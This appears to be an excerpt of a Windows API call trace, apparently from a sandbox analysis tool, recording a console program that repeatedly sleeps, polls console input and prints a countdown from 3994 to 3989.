[0091.301] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0091.301] lstrlenW (lpString="\x08\x08\x08\x083994") returned 8
[0091.301] GetConsoleOutputCP () returned 0x1b5
[0091.301] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083994", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0091.302] GetConsoleOutputCP () returned 0x1b5
[0091.302] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083994", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083994", lpUsedDefaultChar=0x0) returned 8
[0091.302] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0091.302] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0091.302] Sleep (dwMilliseconds=0x64)
[0091.409] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0091.410] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb7
[0091.410] Sleep (dwMilliseconds=0x64)
[0091.519] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0091.519] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb7
[0091.519] Sleep (dwMilliseconds=0x64)
[0091.628] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0091.628] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb7
[0091.628] Sleep (dwMilliseconds=0x64)
[0091.737] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0091.737] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb7
[0091.737] Sleep (dwMilliseconds=0x64)
[0091.846] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0091.846] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb7
[0091.846] Sleep (dwMilliseconds=0x64)
[0091.955] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0091.956] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb7
[0091.956] Sleep (dwMilliseconds=0x64)
[0092.065] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0092.065] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb7
[0092.065] Sleep (dwMilliseconds=0x64)
[0092.175] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0092.176] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb7
[0092.176] Sleep (dwMilliseconds=0x64)
[0092.284] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0092.284] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb8
[0092.284] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083993") returned 8
[0092.284] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0092.285] __iob_func () returned 0x757a2900
[0092.285] _fileno (_File=0x757a2920) returned 1
[0092.285] _errno () returned 0x5507d8
[0092.285] _get_osfhandle (_FileHandle=1) returned 0x4c
[0092.285] _errno () returned 0x5507d8
[0092.285] GetFileType (hFile=0x4c) returned 0x2
[0092.285] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0092.285] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0092.285] lstrlenW (lpString="\x08\x08\x08\x083993") returned 8
[0092.285] GetConsoleOutputCP () returned 0x1b5
[0092.285] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083993", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0092.285] GetConsoleOutputCP () returned 0x1b5
[0092.285] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083993", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083993", lpUsedDefaultChar=0x0) returned 8
[0092.285] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0092.286] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0092.286] Sleep (dwMilliseconds=0x64)
[0092.392] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0092.393] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb8
[0092.393] Sleep (dwMilliseconds=0x64)
[0092.501] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0092.502] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb8
[0092.502] Sleep (dwMilliseconds=0x64)
[0092.611] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0092.611] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb8
[0092.611] Sleep (dwMilliseconds=0x64)
[0092.720] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0092.720] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb8
[0092.720] Sleep (dwMilliseconds=0x64)
[0092.829] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0092.829] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb8
[0092.829] Sleep (dwMilliseconds=0x64)
[0092.938] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0092.938] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb8
[0092.938] Sleep (dwMilliseconds=0x64)
[0093.047] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0093.048] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb8
[0093.048] Sleep (dwMilliseconds=0x64)
[0093.157] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0093.157] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb8
[0093.157] Sleep (dwMilliseconds=0x64)
[0093.266] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0093.266] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb9
[0093.266] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083992") returned 8
[0093.266] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0093.266] __iob_func () returned 0x757a2900
[0093.266] _fileno (_File=0x757a2920) returned 1
[0093.266] _errno () returned 0x5507d8
[0093.266] _get_osfhandle (_FileHandle=1) returned 0x4c
[0093.266] _errno () returned 0x5507d8
[0093.266] GetFileType (hFile=0x4c) returned 0x2
[0093.267] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0093.267] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0093.267] lstrlenW (lpString="\x08\x08\x08\x083992") returned 8
[0093.267] GetConsoleOutputCP () returned 0x1b5
[0093.267] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083992", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0093.267] GetConsoleOutputCP () returned 0x1b5
[0093.267] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083992", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083992", lpUsedDefaultChar=0x0) returned 8
[0093.267] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0093.267] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0093.267] Sleep (dwMilliseconds=0x64)
[0093.375] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0093.375] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb9
[0093.375] Sleep (dwMilliseconds=0x64)
[0093.484] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0093.484] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb9
[0093.485] Sleep (dwMilliseconds=0x64)
[0093.593] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0093.594] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb9
[0093.594] Sleep (dwMilliseconds=0x64)
[0093.703] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0093.703] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb9
[0093.703] Sleep (dwMilliseconds=0x64)
[0093.812] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0093.812] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb9
[0093.812] Sleep (dwMilliseconds=0x64)
[0093.921] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0093.921] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb9
[0093.921] Sleep (dwMilliseconds=0x64)
[0094.030] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0094.030] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb9
[0094.030] Sleep (dwMilliseconds=0x64)
[0094.139] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0094.140] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fb9
[0094.140] Sleep (dwMilliseconds=0x64)
[0094.249] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0094.249] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fba
[0094.249] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083991") returned 8
[0094.249] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0094.249] __iob_func () returned 0x757a2900
[0094.249] _fileno (_File=0x757a2920) returned 1
[0094.249] _errno () returned 0x5507d8
[0094.249] _get_osfhandle (_FileHandle=1) returned 0x4c
[0094.249] _errno () returned 0x5507d8
[0094.249] GetFileType (hFile=0x4c) returned 0x2
[0094.249] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0094.249] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0094.249] lstrlenW (lpString="\x08\x08\x08\x083991") returned 8
[0094.250] GetConsoleOutputCP () returned 0x1b5
[0094.250] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083991", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0094.250] GetConsoleOutputCP () returned 0x1b5
[0094.250] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083991", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083991", lpUsedDefaultChar=0x0) returned 8
[0094.250] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0094.250] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0094.250] Sleep (dwMilliseconds=0x64)
[0094.358] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0094.358] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fba
[0094.358] Sleep (dwMilliseconds=0x64)
[0094.467] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0094.467] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fba
[0094.467] Sleep (dwMilliseconds=0x64)
[0094.576] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0094.576] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fba
[0094.576] Sleep (dwMilliseconds=0x64)
[0094.685] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0094.686] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fba
[0094.686] Sleep (dwMilliseconds=0x64)
[0094.802] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0094.802] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fba
[0094.802] Sleep (dwMilliseconds=0x64)
[0094.904] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0094.904] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fba
[0094.904] Sleep (dwMilliseconds=0x64)
[0095.013] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0095.013] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fba
[0095.013] Sleep (dwMilliseconds=0x64)
[0095.122] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0095.122] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fba
[0095.123] Sleep (dwMilliseconds=0x64)
[0095.231] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0095.232] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbb
[0095.232] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083990") returned 8
[0095.232] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0095.232] __iob_func () returned 0x757a2900
[0095.232] _fileno (_File=0x757a2920) returned 1
[0095.232] _errno () returned 0x5507d8
[0095.232] _get_osfhandle (_FileHandle=1) returned 0x4c
[0095.232] _errno () returned 0x5507d8
[0095.232] GetFileType (hFile=0x4c) returned 0x2
[0095.232] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0095.232] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0095.232] lstrlenW (lpString="\x08\x08\x08\x083990") returned 8
[0095.232] GetConsoleOutputCP () returned 0x1b5
[0095.232] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083990", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0095.232] GetConsoleOutputCP () returned 0x1b5
[0095.233] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083990", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083990", lpUsedDefaultChar=0x0) returned 8
[0095.233] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0095.233] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0095.233] Sleep (dwMilliseconds=0x64)
[0095.341] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0095.341] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbb
[0095.341] Sleep (dwMilliseconds=0x64)
[0095.450] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0095.450] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbb
[0095.450] Sleep (dwMilliseconds=0x64)
[0095.559] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0095.559] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbb
[0095.559] Sleep (dwMilliseconds=0x64)
[0095.668] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0095.669] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbb
[0095.669] Sleep (dwMilliseconds=0x64)
[0095.778] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0095.778] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbb
[0095.778] Sleep (dwMilliseconds=0x64)
[0095.889] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0095.890] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbb
[0095.890] Sleep (dwMilliseconds=0x64)
[0095.996] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0095.996] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbb
[0095.996] Sleep (dwMilliseconds=0x64)
[0096.105] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0096.105] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbb
[0096.105] Sleep (dwMilliseconds=0x64)
[0096.215] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0096.215] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbb
[0096.215] Sleep (dwMilliseconds=0x64)
[0096.323] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0096.324] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbc
[0096.324] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083989") returned 8
[0096.324] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0096.324] __iob_func () returned 0x757a2900
[0096.324] _fileno (_File=0x757a2920) returned 1
[0096.324] _errno () returned 0x5507d8
[0096.324] _get_osfhandle (_FileHandle=1) returned 0x4c
[0096.324] _errno () returned 0x5507d8
[0096.324] GetFileType (hFile=0x4c) returned 0x2
[0096.324] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0096.324] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0096.324] lstrlenW (lpString="\x08\x08\x08\x083989") returned 8
[0096.324] GetConsoleOutputCP () returned 0x1b5
[0096.324] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083989", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0096.325] GetConsoleOutputCP () returned 0x1b5
[0096.325] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083989", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083989", lpUsedDefaultChar=0x0) returned 8
[0096.325] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0096.325] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0096.325] Sleep (dwMilliseconds=0x64)
[0096.433] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0096.434] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbc
[0096.434] Sleep (dwMilliseconds=0x64)
[0096.542] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0096.542] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbc
[0096.542] Sleep (dwMilliseconds=0x64)
[0096.651] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0096.651] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbc
[0096.651] Sleep (dwMilliseconds=0x64)
[0096.792] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0096.792] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbc
[0096.792] Sleep (dwMilliseconds=0x64)
[0096.952] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0096.952] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbc
[0096.952] Sleep (dwMilliseconds=0x64)
[0097.135] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0097.135] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fbc
[0097.135] Sleep (dwMilliseconds=0x64)
